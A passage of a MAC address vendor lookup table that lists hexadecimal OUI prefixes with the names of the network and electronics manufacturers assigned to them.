Limited +001CFF Napera Networks +001CF8 Parade Technologies +001CF1 SUPoX Technology +001CF2 Tenlon Technology +001CEC Mobilesoft (Aust.) +001CE7 Rocon PLC Research Centre +001CE2 Attero Tech +001CDB Carpoint +001CD5 ZeeVee +001CCF Limetek +001E08 Centec Networks +001E03 LiComm +001DFC Ksic +001DF5 Sunshine +001DF0 Vidient Systems +001DDC HangZhou DeChangLong Tech&Info +001DE4 Visioneered Image Systems +001DE2 Radionor Communications +001CC8 Industronic Industrie-electronic Gmbh & KG +001CBC CastGrabber +001CB2 BPT SPA +001CA6 Win4NET +001CAB Meyer Sound Laboratories +001CAC Qniq Technology +001CA1 Akamai Technologies +001C95 Opticomm +001C90 Empacket +001C8F Advanced Electronic Design +001C89 Force Communications +001C7F Check Point Software Technologies +001C75 Segnet +001C6E Newbury Networks +001C69 Packet Vision +001DA5 WB Electronics +001DA6 Media Numerics Limited +001DA0 Heng Yu Electronic Manufacturing Company Limited +001D99 Cyan Optic +001D94 Climax Technology +001D93 Modacom +001D8D Raytek GmbH +001D86 Shinwa Industries(China) +001DC9 GainSpan +001DC2 Xortec OY +001DBD Versamed +001DB6 BestComm Networks +001DB0 FuJian HengTong Information Technology +001DAC Gigamon Systems +001D81 Guangzhou Gateway Electronics +001D69 Knorr-Bremse IT-Services GmbH +001D70 Cisco Systems +001D77 NSGate +001D7C ABE Elettronica +001D64 Adam Communications Systems Int +001D5D Control Dynamics +001D21 Alcad SL +001D1C Gennet +001D17 Digital Sky +001D12 Rohm +001D11 Analogue & Micro +001D0B Power Standards Lab +001D04 Zipit Wireless +001D58 CQ +001D57 Caetec Messtechnik +001D51 Babcock & Wilcox Power Generation Group +001D47 Covote GmbH & KG +001D40 Intel GE Care Innovations +001D34 Syris Technology +001D2D Pylone +001B2A Cisco Systems +001B1D Phoenix International +001B22 Palit Microsystems ( H.K.) +001B1B Siemens AG +001B16 Celtro +001B0A Intelligent Distributed Controls +001B0F Petratec +001AFE Sofacreal +001B03 Action Technology (SZ) +001B68 Modnnet +001B62 JHT Optoelectronics +001B61 Digital Acoustics +001B5C Azuretec +001B55 Hurco Automation +001B50 Nizhny Novgorod Factory Named After M.frunze, Fsue (nzif) +001B44 SanDisk +001B49 Roberts Radio limited +001B42 Wise & Blue +001B3D EuroTel Spa +001B36 Tsubata Engineering,Ltd. (Head Office) +001B31 Neural Image. +001C56 Pado Systems +001C5B Chubb Electronic Security Systems +001C5D Leica Microsystems +001C5C Integrated Medical Systems +001C51 Celeno Communications +001C52 Visionee SRL +001C45 Chenbro Micom +001C4C Petrotest Instruments +001C39 S Netsystems +001C40 VDG-Security bv +001C32 Telian +001AC7 Unipoint +001AC2 YEC +001AB8 Anseri +001ABD Impatica +001AB1 Asia Pacific Satellite Industries +001B8C JMicron Technology +001B91 Efkon AG +001B87 Deepsound Tech. +001B82 Taiwan Semiconductor +001B7B The Tintometer +001B74 MiraLink +001B6F Teletrak +001AFC ModusLink +001AF2 Dynavisions Schweiz AG +001AF7 dataschalt e+a GmbH +001AED Incotec Gmbh +001ADF Interactivetv Limited +001AE1 Edge Access +001AE6 Atlanta Advanced Communications Holdings Limited +001AD3 Vamp +001ADA Biz-2-Me +001ACE Yupiteru +001BC8 Miura +001BC1 Holux Technology +001BB7 Alta Heights Technology +001BAB Telchemy, Incorporated +001BB0 Bharat Electronics +001BA4 S.A.E Afikim +001B9F Calyptech +001B9D Novus Security Sp. z o.o. +001BF6 Conwise Technology +001BF1 Nanjing SilverNet Software +001BEC Netio Technologies +001BE7 Postek Electronics +001BE0 Telenot Electronic Gmbh +001BD9 Edgewater Computer Systems +001BDB Valeo Vecs +001BD4 Cisco Systems +001BCD Daviscomms (S) PTE +001C2D FlexRadio Systems +001C1C Center Communication Systems GmbH +001C21 Nucsafe +001C20 CLB Benelux +001C15 iPhotonix +001C16 ThyssenKrupp Elevator +001C10 Cisco-Linksys +001C09 SAE Electronic +001C04 Airgain +001BFD Dignsys +00192B Aclara RF Systems +001930 Cisco Systems +00191F Microlink communications +001924 Lbnl Engineering +001911 Just In Mobile Information Technologies (Shanghai) +001918 Interactive Wear AG +00190C Encore Electronics +001900 Intelliverese - DBA Voicecom +001905 Schrack Seconet AG +0018F4 EO Technics +0018F6 Thomson Telecom Belgium +0018FB Compro Technology +0019EE Carlo Gavazzi Controls Spa-controls Division +0019F5 Imagination Technologies +0019E9 S-Information Technolgy +0019DB Micro-star International +0019DD FEI-Zyfer +0019CA Broadata Communications +0019CF Salicru +0019D6 LS Cable and System +0019B4 Intellio +001A6E Impro Technologies +001A67 Infinite QL Sdn Bhd +001A69 Wuhan Yangtze Optical Technology +001A62 Data Robotics, Incorporated +001A58 CCV Deutschland GmbH - Celectronic eHealth Div. +001A5D Mobinnova +001A4C Crossbow Technology +001A51 Alfred Mann Foundation +001AAA Analogic +001AA1 Cisco Systems +001A9C RightHand Technologies +001A8B Chunil Electric IND. +001A95 Hisense Mobile Communications Technoligy +001A84 V One Multimedia Pte +0019A1 LG Information & COMM. +0019AD Bobst SA +0019B2 XYnetsoft +00199A Edo-evi +00199F DKT A/S +001995 Jurong Hi-Tech (Suzhou)Co.ltd +001990 ELM Data +001989 Sonitrol +001A3E Faster Technology +001A40 A-four Tech +001A2D The Navvo Group +001A32 Activa Multimedia +001A28 Aswt, Taiwan Branch H.K. +001A1C GT&T Engineering Pte +001A23 Ice Qube +001A15 gemalto e-Payment +001A10 Lucent Trans Electronics +001A09 Wayfarer Transit Systems +001A02 Secure Care Products +001A04 Interay Solutions BV +001984 Estic +001976 Xipher Technologies +001978 Datum Systems +00196A MikroM GmbH +001971 Guangzhou Unicomp Technology +001965 YuHua TelTech (ShangHai) +001960 DoCoMo Systems +001954 Leaf +001959 Staccato Communications +00194D Avago Technologies Sdn Bhd +001948 AireSpider Networks +001941 Pitney Bowes +001935 Duerr Dental AG +00193A Oesolutions +00193C HighPoint Technologies Incorporated +001773 Laketune Technologies +001778 Central Music +00177A Assa Abloy AB +00176F PAX Computer Technology(Shenzhen) +00176A Avago Technologies +001763 Essentia +00175E Zed-3 +001750 GSI Group, MicroE Systems +001752 DAGS +001757 RIX Technology Limited +00183D Vertex Link +001844 Heads Up Technologies +001838 PanAccess Communications +001827 NEC Unified Solutions Nederland +00182C Ascend Networks +00181B TaiJin Metal +001814 Mitutoyo +001819 Cisco Systems +001820 w5networks +001808 SightLogix +00180D Terabytes Server Storage Tech +001803 ArcSoft Shanghai +0017F0 Szcom Broadband Network Technology +0017F7 CEM Solutions Pvt +0017FE Talos System +0017D8 Magnum Semiconductor +0017DD Clipsal Australia +0017DF Cisco Systems +0018C6 OPW Fuel Management Systems +0018CB Tecobest Technology Limited +0018BF Essence Technology Solution +0018BA Cisco Systems +0018B8 New Voice International AG +0018B3 TEC WizHome +0018AC Shanghai Jiao Da Hisys Technology +0018A5 ADigit Technologies +0018A7 Yoggie Security Systems +001896 Great Well Electronic +00189B Thomson +00179E Sirit +0017A3 MIX s.r.l. +0017A8 EDM +001792 Falcom Wireless Comunications Gmbh +001797 Telsy Elettronica +001799 SmarTire Systems +00178B Teledyne Technologies Incorporated +00177F Worldsmart Retech +001786 wisembed +001877 Amplex A/S +00186B Sambu Communics +001870 E28 Shanghai Limited +001863 Veritech Electronics Limited +001850 Secfone Kft +001855 Aeromaritime Systembau GmbH +001857 Unilever R&D +001849 Pigeon Point Systems +0017C7 Mara Systems Consulting AB +0017CE Screen Service Spa +0017D3 Etymotic Research +0017BB Syrinx Industrial Electronics +0017B4 Remote Security Systems +0017B6 Aquantia +0017AF Enermet +0018E8 Hacetron +0018EF Escape Communications +0018E3 Visualgate Systems +0018DC Prostar +0018E1 Verkerk Service Systemen +0018D0 AtRoad, A Trimble Company +0018D5 Reigncom +0018A0 Cierma Ascenseurs +001883 Formosa21 +00188A Infinova +00188F Montgomery Technology +00187C Intercross +00187E RGB Spectrum +00164A Vibration Technology Limited +001644 Lite-on Technology +001645 Power Distribution +00163B VertexRSI/General Dynamics +001640 Asmobile Communication +00163A Yves Technology +001634 Mathtech +00162D STNet +001621 Colorado Vnet +00161A Dametric AB +001615 Nittan Company, Limited +0016C4 SiRF Technology +0016C6 North Atlantic Industries +0016D2 Caspian +0016BF PaloDEx Group Oy +0016B3 Photonicbridges (China) +0016AC Toho Technology +0016B1 KBS +0016A7 Aweta G&P +001724 Studer Professional Audio GmbH +001718 Vansco Electronics Oy +00171D Digit +001711 GE Healthcare Bio-Sciences AB +00170C Twig Com +001707 InGrid +001702 Osung Midicom +001744 Araneo +00173C Extreme Engineering Solutions +001737 Industrie Dial Face +00172B Global Technologies +001730 Automation Electronics +001729 UbicodLTD +00169B Alstom Transport +0016A2 CentraLite Systems +001696 QDI Technology (H.K.) Limited +001688 ServerEngines +00168A id-Confirm +001683 Webio International +00167C iRex Technologies BV +001610 Carina Technology +00160B TVWorks +001604 Sigpro +0015FE Schilling Robotics +0015FD Complete Media Systems +0015F8 Kingtronics Industrial +0015EC Boca Devices +0015F1 Kylink Communications +001677 Bihl + Wiedemann GmbH +001670 Sknet +001664 Prod-El SpA +001669 MRV Communication (Networks) +00165D AirDefense +001651 Exeo Systems +0015E5 Cheertek +0015DB Canesta +0015D4 Emitor AB +0015C8 FlexiPanel +0015C3 Ruf Telematik AG +0015C2 3M Germany +0015BE Iqua +0016EF Koko Fitness +0016F4 Eidicom +0016E8 Sigma Designs +0016DC Archos +0016E1 SiliconStor +0016D7 Sunways AG +0014CB LifeSync +0014D0 BTI Systems +0014C4 Vitelcom Mobile Technology +0014BE Wink communication technologyLTD +0014BD incNETWORKS +0014B8 Hill-Rom +0014AE Wizlogics +0014B3 CoreStar International +00149B Nokota Communications +001431 PDL Electronics +001433 Empower Technologies(Canada) +001432 Tarallax Wireless +00142C Koncept International +001425 Galactic Computing +001420 G-Links networking company +00141B Cisco Systems +00146D RF Technologies +00146F Kohler +00146E H. Stoll GmbH & KG +001468 CelPlan International +001461 Corona +00145C Intronics +001455 Coder Electronics +001444 Grundfos Holding +00144B Hifn +001589 D-MAX Technology +001582 Pulse Eight Limited +00157C Dave Networks +001578 Audio / Video Innovations +001573 NewSoft Technology +00156C Sane System +001571 Nolan Systems +001572 Red-Lemon +001565 Xiamen Yealink Network Technology +001559 Securaplane Technologies +0014A2 Core Micro Systems +001494 ESU AG +00148F Protronic (Far East) +001488 Akorri +001483 eXS +001480 Hitachi-LG Data Storage Korea +00147B Iteris +001474 K40 Electronics +0015B8 Tahoe +0015B2 Advanced Industrial Computer +0015AE kyung il +0015AD Accedian Networks +00E0A8 SAT GmbH & +0015A1 Eca-sinters +00159C B-kyung System +001595 Quester Tangent +00158E Plustek.INC +001552 Wi-Gear +001548 Cube Technologies +00154D Netronome Systems +00153C Kprotech +001543 Aberdeen Test Center +001535 OTE Spa +001537 Ventus Networks +001536 Powertech +001529 N3 +0014F9 Vantage Controls +0014FB Technical Solutions +0014FA AsGa +0014F4 DekTec Digital Video +0014ED Airak +0014DE Sage Instruments +0014E3 mm-lab GmbH +0014D7 Datastore Technology +001524 Numatics +00151D M2I +001513 EFS sas +001507 Renaissance Learning +00129E Surf Communications +001297 O2Micro +001298 Mico Electric(shenzhen) Limited +00128D STB Datenservice GmbH +00128E Q-Free ASA +001292 Griffin Technology +00127C Swegon AB +001281 March Networks +00127B VIA Networking Technologies +001327 Data Acquisitions limited +00131D Scanvaegt International A/S +001322 DAQ Electronics +001316 L-S-B Broadcast Technologies GmbH +00130F Egemen Bilgisayar Muh San ve Tic STI +0012F7 Xiamen Xinglian Electronics +0012FE Lenovo Mobile Communication Technology +001303 GateConnect +0012FD Optimus IC +00140F Federal State Unitary Enterprise Leningrad R&D Institute of +001416 Scosche Industries +001406 Go Networks +001407 Sperian Protection Instrumentation +00140C GKB Cctv +0013FF Dage-MTI of MC +001400 Minerva Korea +0013FA LifeSize Communications +0013F3 Giga-byte Communications +0013EE JBX Designs +0013ED Psia +00135A Project T&E Limited +00135F Cisco Systems +001360 Cisco Systems +001352 Naztec +00134B ToGoldenNet Technology +00134C YDT Technology International +00133A VadaTech +00133F Eppendorf Instrumente GmbH +00132C MAZ Brandenburg GmbH +001339 CCV Deutschland GmbH +0013AD Sendo +0013B4 Appear TV +0013A8 Tanisys Technology +0013A7 Battelle Memorial Institute +0013A1 Crow Electronic Engeneering +00139A K-ubique ID +001395 congatec AG +00138E Foab Elektronik AB +001388 WiMedia Alliance +0013E4 Yangjae Systems +0013E9 VeriWave +0013E3 CoVi Technologies +0013DD Abbott Diagnostics +0013D6 TII Network Technologies +0013D1 Kirk Telecom A/S +0013CA Pico Digital +0013C3 Cisco Systems +0013C4 Cisco Systems +0013BA ReadyLinks +0013BE Virtual Conexions +0013B9 BM SPA +0012F3 connectBlue AB +0012ED AVG Advanced Technologies +0012E6 Spectec Computer +0012E1 Alliant Networks +0012D3 Zetta Systems +0012DA Cisco Systems +0012D4 Princeton Technology +0012C7 Securay Technologiesco. +0012CE Advanced Cybernetics Group +0012C2 Apex Electronics Factory +0012C1 Check Point Software Technologies +0012B8 G2 Microsystems +0012BD Avantec Manufacturing Limited +0012B7 PTW Freiburg +0012B1 Dai Nippon Printing +0012A5 Stargen +0012AA IEE +001379 Ponder Information Industries +001380 Cisco Systems +001385 Add-On Technology +00137F Cisco Systems +00136D Tentaculus AB +001366 Neturity Technologies +001258 Activis Polska +001251 Silink +001252 Citronix +001245 Zellweger Analytics +00124C Bbwm +001239 S Net Systems +001240 Amoi Electronics +00122D SiNett +001232 LeWiz Communications +0011C5 TEN Technology +0011C8 Powercom +0011CD Axsun Technologies +0011C6 Seagate Technology +0011B4 Westermo Teleindustri AB +0011B9 Inner Range +0011C0 Aday Technology +0011B3 Yoshimiya +0011AD Shanghai Ruijie Technology +001138 Taishin +00113F Alcatel DI +001133 Siemens Austria Simea +001132 Synology Incorporated +001129 Paradise Datacom +00112E Ceicom +001128 Streamit +001122 Cimsys +001171 Dexter Communications +00116A Domo +001160 Artdio Company +001154 Webpro Technologies +00114B Francotyp-Postalia GmbH +001145 ValuePoint Networks +0011A1 Vision Netware +0011A6 Sypixx Networks +00119A Alkeria srl +001190 Digital Design +00118A Viewtran Technology Limited +001194 Chi Mei Communication Systems +001189 Aerotech +001184 Humo Laboratory +00117D ZMD America +001178 Chiron Technology +001177 Coaxial Networks +001223 Pixim +001228 Data +001210 WideRay +001215 iStor Networks +001216 ICP Internet Communication Payment AG +001209 Fastrax +001204 u10 Networks +0011FD Korg +001203 ActivNetworks +0011F3 NeoMedia Europe AG +0011E7 Worldsat - Texas de France +0011EC Avix +0011E0 U-media Communications +0011DA Vivaas Technology +0011D4 NetEnrich +0011D9 TiVo +00111C Pleora Technologies +00110F netplat +001116 Coteau Vert +001109 Micro-Star International +001103 kawamura electric +000FFD Glorytek Network +000FEE XTec, Incorporated +001275 Sentilla +00126E Seidel Elektronik GmbH Nfg.KG +001269 Value Electronics +00125C Green Hills Software +000F15 Kjaerulff1 A/S +000F1A Gaming Support +000F0E WaveSplitter Technologies +000F08 Indagon Oy +000F07 Mangrove Systems +000F02 Digicube Technology +000EFB Macey Enterprises +000EF5 iPAC Technology +000EF6 E-TEN Information Systems +000E8A Avara Technologies +000E83 Cisco Systems +000E73 Tpack A/S +000E7D Electronics Line 3000 +000E77 Decru +000E7E ionSign Oy +000E6F Iris Berhad +000E6A 3Com +000E69 China Electric Power Research Institute +000E63 Lemke Diagnostics GmbH +000EBC Paragon Fidelity GmbH +000EB0 Solutions Radio BV +000EB5 Ecastle Electronics +000EAF Castel +000EA9 Shanghai Xun Shi Communications Equipment +000E9D Tiscali UK +000EA2 McAfee +000E90 Ponico +000E8F Sercomm +000E96 Cubic Defense Applications +000F4E Cellink +000F41 Zipher +000F48 Polypix +000F4D TalkSwitch +000F39 Iris Sensors +000F3C Endeleo Limited +000F34 Cisco Systems +000F2D Chung-hsin Electric & Machinery Mfg.corp. +000F27 Teal Electronics +000F28 Itronix +000F21 Scientific Atlanta +000EEF Private +000EDC Tellion +000EE3 Chiyu Technology +000EC8 Zoran +000ECF Profibus Nutzerorganisation e.V. +000ED4 Cresitt Industrie +000EC2 Lowrance Electronics +000EC1 Mynah Technologies +000F92 Microhard Systems +000F99 Apac Opto Electronics +000F8D Fast Tv-server AG +000F80 Trinity Security Systems +000F7F Ubstorage +000FC9 Allnet GmbH +000FBC Onkey Technologies +000FBB Nokia Siemens Networks GmbH & KG. +000FB6 Europlex Technologies +000FA9 PC Fabrik +000FAA Nexus Technologies +000FAF Dialog +000FE8 Lobos +000FED Anam Electronics +000FDC Ueda Japan Radio +000FE1 ID Digital +000FD5 Schwechat - Rise +000FCE Kikusui Electronics +000F73 RS Automation +000F7A BeiJing NuQX Technology +000F6D Midas Engineering +000F67 West Instruments +000F6E BBox +000F60 Lifetron +000F5B Delta Information Systems +000F54 Entrelogic +000D75 Kobian Pte - Taiwan Branch +000D7C Codian +000D6F Ember +000D69 TMT&D +000D70 Datamax +000D5D Raritan Computer +000D62 Funkwerk Dabendorf GmbH +000D50 Galazar Networks +000D4A Steag ETA-Optik +000DAB Parker Hannifin GmbH Electromechanical Division Europe +000DA7 Private +000DA1 Mirae ITS +000DA2 Infrant Technologies +000D9B Heraeus Electro-Nite International N.V. +000D8F King Tsushin Kogyo +000D94 Afar Communications +000D82 PHS srl +000D81 Pepperl+Fuchs GmbH +000DCE Dynavac Technology Pte +000DC8 AirMagnet +000DC2 Private +000DC7 Cosmic Engineering +000DBB Nippon Dentsu +000DB5 Globalsat Technology +000DAF Plexus (UK) +000D29 Cisco Systems +000D23 Smart Solution +000D17 Turbo NetworksLtd +000D1C Amesys Defense +000D0A Projectiondesign as +000D09 Yuehua(Zhuhai) Electronic +000D10 Embedtronics Oy +000D04 Foxboro Eckardt Development GmbH +000CFD Hyundai ImageQuest +000D4F Kenwood +000D46 Parker SSD Drives +000D42 Newbest Development Limited +000D3C i.Tech Dynamic +000D36 Wu Han Routon Electronic +000D3B Microelectronics Technology +000D2A Scanmatic AS +000D2F AIN Comm.Tech.Co. +000DFA Micro Control Systems +000DF4 Watertek +000DF9 NDS Limited +000E00 Atrie +000DE7 Snap-on OEM Group +000DE8 Nasaco Electronics Pte. +000DED Cisco Systems +000DE1 Control Products +000DD5 O'rite Technology +000DDA Allied Telesis K.K. +000E20 Access Systems Americas +000E27 Crere Networks +000E14 Visionary Solutions +000E1B IAV GmbH +000E57 Iworld Networking +000E50 Thomson Telecom Belgium +000E4A Changchun Huayu Webpad +000E49 Forsway Scandinavia AB +000E3D Televic N.V. +000E44 Digital 5 +000E33 Shuko Electronics +000E3A Cirrus Logic +000E2D Hyundai Digital Technology +000CEA aphona Kommunikationssysteme +000CD9 Itcare +000CD3 Prettl Elektronik Radeberg GmbH +000CDA FreeHand Systems +000CDF Pulnix America +000CC7 Intelligent Computer Solutions +000CCC Aeroscout +000C13 MediaQ +000C05 RPA Reserch +000C0C Appro Technology +000BF4 Private +000BF9 Gemstone Communications +000C00 BEB Industrie-Elektronik AG +000BF3 BAE Systems +000C63 Zenith Electronics +000C68 SigmaTel +000C6F Amtek system +000C50 Seagate Technology +000C55 Microlink Communications +000C5C GTN Systems +000C61 AC Tech DBA Advanced Digital +000CBA Jamex +000CB9 LEA +000CC0 Genera Oy +000CB4 AutoCell Laboratories +000C34 Vixen +000CA2 Harmonic Video Network +000CA7 Metro (Suzhou) Technologies +000CA9 Ebtron +000CAE Ailocom Oy +000C42 Routerboard.com +000C44 Automated Interfaces +000C39 Sentinel Wireless +000C3B Orion Electric +000C40 Altech Controls +000C3A Oxance +000C2F SeorimTechnology +000C31 Cisco Systems +000C2A Octtel Communication +000C27 Sammy +000C18 Zenisu Keisoku +000C20 Fi WIn +000BED ELM +000BF2 Chih-Kan Technology +000BE1 Nokia NET Product Operations +000BE6 Datel Electronics +000BDA EyeCross +000BD1 Aeronix +000BC5 SMC Networks +000BCC Jusan +000BB9 Imsys AB +000BBE Cisco Systems +000BB2 Smallbig Technology +000BB7 Micro Systems +000C96 OQO +000C9B EE Solutions +000C8A Bose +000C8F Nergal s.r.l. +000C83 Logical Solutions +000C88 Apache Micro Peripherals +000C74 Rivertec +000C76 Micro-star International +000C7B Alpha Project +000B85 Cisco Systems +000B7F Align Engineering +000B84 Bodet +000B73 Kodeos Communications +000B78 Taifatech +000B6C Sychip +000B60 Cisco Systems +000B65 Sy.A.C. srl +000B57 Silicon Laboratories +000B5C Newtech +000B43 Microscan Systems +000B48 sofrel +000B4A Visimetrics (UK) +000B35 Quad Bit System +000B37 Manufacture DES Montres Rolex SA +000B3C Cygnal Integrated Products +000B29 LS(LG) Industrial Systems +000B30 Beijing Gongye Science & Technology +000BA8 Hanback Electronics +000B92 Ascom Danmark A/S +000B97 Matsushita Electric Industrial +000B9C TriBeam Technologies +000B8B Kerajet +0009D6 KNC One GmbH +0009D5 Signal Communication +0009DC Galaxis Technology AG +0009C9 BlueWINC +0009D0 Solacom Technologies +0009C1 Proces-data A/S +0009C4 Medicore +00098F Cetacean Networks +00097D SecWell Networks Oy +00097E IMI Technology +000983 GlobalTop Technology +000970 Vibration Research +000977 Brunner Elektronik AG +000964 Hi-Techniques +00096B IBM +000957 Supercaller +00095C Philips Medical Systems - Cardiac and Monitoring Systems (CM +000AE3 Yang MEI Technology +000AEA Adam Elektronik ti +000ADE Happy Communication +000AD7 Origin Electric +000ACB Xpak MSA Group +000AD0 Niigata Develoment Center, F.I.T. +000AD2 Jepico +000ABD Rupprecht & Patashnick +000ABF Hirota SS +000AC4 Daewoo Teletech +000AAC TerraTec Electronic GmbH +000AB1 Genetec +000AB8 Cisco Systems +000AA5 Maxlink Industries Limited +000A8D Eurotherm Limited +000A9E BroadWeb Corportation +000AA0 Cedar Point Communications +000A98 M+F Gwinner GmbH & +000A92 Presonus +000A7E The Advantage Group +000A85 Plat'c2 +000A8A Cisco Systems +0009B5 3J Tech. +0009AF e-generis +0009B0 Onkyo +0009A9 Ikanos Communications +00099D Haliplex Communications +0009A2 Interface +000990 Acksys Communications & Systems +000996 RDI +00098A EqualLogic +000A77 Bluewire Technologies +000A79 corega K.K +000A72 STEC +000A5F almedio +000A66 Mitsubishi Electric System & Service +000A6B Tadiran Telecom Business Systems +000A5A GreenNET Technologies +000A53 Intronics, Incorporated +000A58 Freyer & Siegel Elektronik GmbH & KG +000A4C Molecular Devices +000B24 AirLogic +000B1D LayerZero Power Systems +000B16 Communication Machinery +000B18 Private +000B11 Himeji ABC Trading +000B0A dBm Optics +000B05 Pacific Broadband Networks +000AFE NovaPal +000B03 Taekwang Industrial +000AEF Otrum ASA +000AF2 NeoAxiom +000A05 Widax +000A0A Sunix +000A0F Ilryung Telesys +0009FF X.net 2000 GmbH +0009FE Daisy Technologies +000A00 Mediatek +0009F6 Shenzhen Eastern Digital Tech +0009F5 Emerson Network Power +0009E8 Cisco Systems +0009EF Vocera Communications +0009E3 Angel Iglesias +000A39 LoPA Information Technology +000A40 Crown Audio -- Harmanm International +000A45 Audio-Technica +000A47 Allied Vision Technologies +000A34 Identicard Systems Incorporated +000A2D Cabot Communications Limited +000A22 Amperion +000A16 Lassen Research +000A1B Stream Labs +000878 Benchmark Storage Innovations +000872 Sorenson Communications +00087E Bon Electro-Telecom +00086B Mipsys +000865 Jascom +000866 DSX Access Systems +00085F Picanol N.V. +000859 ShenZhen Unitone Electronics +000853 Schleicher GmbH & Relaiswerke KG +000858 Novatechnology +00081D Ipsil, Incorporated +000829 Aval Nagasaki +000823 Texa +00082A Powerwallz Network Security +000817 EmergeCore Networks +00091E Firstech Technology +000925 VSN Systemen BV +000918 Samsung Techwin +000917 WEM Technology +000912 Cisco Systems +00090B MTL Instruments PLC +000905 iTEC Technologies +0008FF Trilogy Communications +000906 Esteem Networks +0008FB SonoSite +0008F2 C&S Technology +0008F7 Hitachi, Semiconductor & Integrated Circuits Gr +0008ED ST&T Instrument +0007D1 Spectrum Signal Processing +0007CE Cabletime Limited +0007C8 Brain21 +0007BC Identix +00047C Skidata AG +0007BB Candera +0007C2 Netsys Telecom +0007B5 Any One Wireless +0007AF Red Lion Controls +0007A2 Opteon +0007A7 A-Z +0007A1 Viasys Healthcare Gmbh +0007A8 Haier Group Technologies +00094A Homenet Communications +000949 Glyph Technologies +000950 Independent Storage +000944 Cisco Systems +00093D Newisys +000937 Inventec Appliance +000931 Future Internet +000938 Allot Communications +00092A Mytecs +0008B1 ProQuent Systems +0008AB EnerLinx.com +0008AC Eltromat GmbH +0008A5 Peninsula Systems +000899 Netbind +00089E Beijing Enter-NetLTD +000895 Dirc Technologie Gmbh &KG +000891 Lyan +00088B Tropic Networks +00088A Minds@Work +000885 EMS Dr. Thomas Wnsche +0008E8 Excel Master +0008E7 SHI ControlSystems +0008E1 Barix AG +0008DA SofaWare Technologies +0008D5 Vanguard Networks Solutions +0008CE IPMobileNet +0008C8 Soneticom +0008C4 Hikari +0008BE Xenpak MSA Group +0008B8 E.F. Johnson +00079B Aurora Networks +00078F Emkay Innovative Products +000788 Clipcomm +000779 Sungil Telecom +000778 Gerstel Gmbh & KG +00076C Daehanet +00075C Eastman Kodak Company +000768 Danfoss A/S +000762 Group Sense Limited +000755 Lafon +00074F Cisco Systems +000741 Sierra Automated Systems +000749 CENiX +000735 Flarion Technologies +00073B Tenovis GmbH & KG +000729 Kistler Instrumente AG +00072E North Node AB +000728 Neo Telecom +000718 iCanTek +000806 Raonet Systems +0007FD LANergy +0007F6 Qqest Software Systems +0007FC Adept Systems +0007EA Massana +0007F0 LogiSync +0007E3 Navcom Technology +0007E4 SoftRadio +0007DD Cradle Technologies +0007D7 Caporis Networks AG +0006E3 Quantitative Imaging +0006DD AT & T Laboratories - Cambridge +0006A4 Innowell +0006D3 Alpha Telecom, U.S.A. +0006D2 Tundra Semiconductor +000647 Etrali +0006D9 IPM-Net +0005EA Rednix +0006CD Leaf Imaging +0006BC Macrolink +0006C6 lesswire AG +000654 Winpresa Building Automation Technologies GmbH +0006B6 Nir-Or Israel +0006B0 Comtech EF Data +00071F European Systems Integration +000724 Telemax +000707 Interalia +00070C SVA-Intrusion.com +000711 Acterna +000712 JAL Information Technology +0006FA IP Square +0006EF Maxxan Systems +0006EA Elzet80 Mikrocomputer Gmbh&co. KG +0006E9 Intime +0005EB Blue Ridge Networks +0005E4 Red Lion Controls +0005F1 Vrcom +0005FD PacketLight Networks +0005E2 Creativ Network Technologies +0005DC Cisco Systems +0005E1 Trellis Photonics +0005D8 Arescom +0005D7 Vista Imaging +0005C5 Flaga HF +0005D1 Metavector Technologies +0005D2 DAP Technologies +0005CB Rois Technologies +00057F Acqis Technology +000579 Universal Control Solution +000575 CDS-Electronics BV +00056F Innomedia Technologies Pvt. +000568 Piltofish Networks AB +000562 Digital View Limited +00055C Kowa Company +000556 360 Systems +000550 Vcomms Connect Limited +000545 Internet Photonics +00053F VisionTek +000546 Kddi Network & Solultions +0006AA VT Miltope +0006A9 Universal Instruments +0006A0 Mx Imaging +00069F Kuokoa Networks +000699 Vida Design +000693 Flexus Computer Technology +00069A e & Tel +00068D Sepaton +000687 Omnitron Systems Technology +000680 Card Access +000539 A Brand New World in Sweden AB +000526 Ipas Gmbh +00052D Zoltrix International Limited +00052C Supreme Magic +000520 Smartronix +00051A 3com Europe +000510 Infinite Shanghai Communication Terminals +000514 KDT Systems +000509 Avoc Nishimura +000503 Iconag +00050A ICS Spa +0004FF Acronet +000500 Cisco Systems +000641 Itcn +00063D Microwave Data Systems +000630 Adtranz Sweden +000637 Toptrend-Meta Information (ShenZhen) +000620 Serial System +00061A Zetari +00060C Melco Industries +000614 Prism Holdings +000606 RapidWAN +000677 Sick AG +000673 TKH Security Solutions USA +000666 Roving Networks +00066D Compuprint +00066C Robinson +000653 Cisco Systems +00065A Strix Systems +00064D Sencore +000660 Nadex +0005B8 Electronic Design Associates +0005BF JustEzy Technology +0005AE Mediaport USA +0005B2 Medison +00059E Zinwell +0005A5 Kott +000598 Cronos S.r.l. +0005A4 Lucid Voice +000592 Pultek +00058B IPmental +00058C Opentech +00037E Portech Communications +000383 Metera Networks +000377 Gigabit Wireless +00037B Idec Izumi +00036B Cisco Systems +000372 Ulan +000367 Jasmine Networks +00036A Mainnet +000364 Scenix Semiconductor +00035F Prftechnik Condition Monitoring GmbH & KG +00035C Saint Song +00034D Chiaro Networks +0003FA TiMetra Networks +0003F5 Chip2Chip +0003EE MKNet +0003E8 Wavelength Digital Limited +0003E3 Cisco Systems +0003DC Lexar Media +0003D7 NextNet Wireless +0003D4 Alloptic +00030B Hunter Technology +0003D0 Koankeiso +0003C9 Tecom +0003C4 Tomra Systems ASA +0004FA NBS Technologies +0004F9 Xtera Communications +0004F3 FS Forth-systeme Gmbh +0004E7 Lightpointe Communications +0004ED Billion Electric +0004DD Cisco Systems +0004D6 Takagi Industrial +0004D0 Softlink s.r.o. +0004CA FreeMs +0004BE OptXCon +0004C3 Castor Informatique +0004C4 Allen & Heath Limited +0004B7 AMB i.t. Holding +0004B1 Signal Technology +0004AD Malibu Networks +0004AA Jetstream Communications +00049D Ipanema Technologies +000497 MacroSystem Digital Video AG +000490 Optical Access +00048B Poscon +000341 Axon Digital Design +00033E Tateyama System Laboratory +00033A Silicon Wave +000333 Digitel +00032B GAI Datenfunksysteme GmbH +000327 Act'l +00032E Scope Information Management +000322 Idis +00031E Optranet +00B052 Atheros Communications +000319 Infineon AG +000316 Nobell Communications +000312 TR-Systemtechnik GmbH +000447 Acrowave Systems +00043B Lava Computer Mfg. +000440 cyberPIXIE +00043A Intelligent Telecommunications +000434 Accelent Systems +00042D Sarian Systems +00042E Netous Technologies +000428 Cisco Systems +000421 Ocular Networks +000417 Elau AG +000411 Inkra Networks +00040B 3com Europe +000404 Makino Milling Machine +000481 Econolite Control 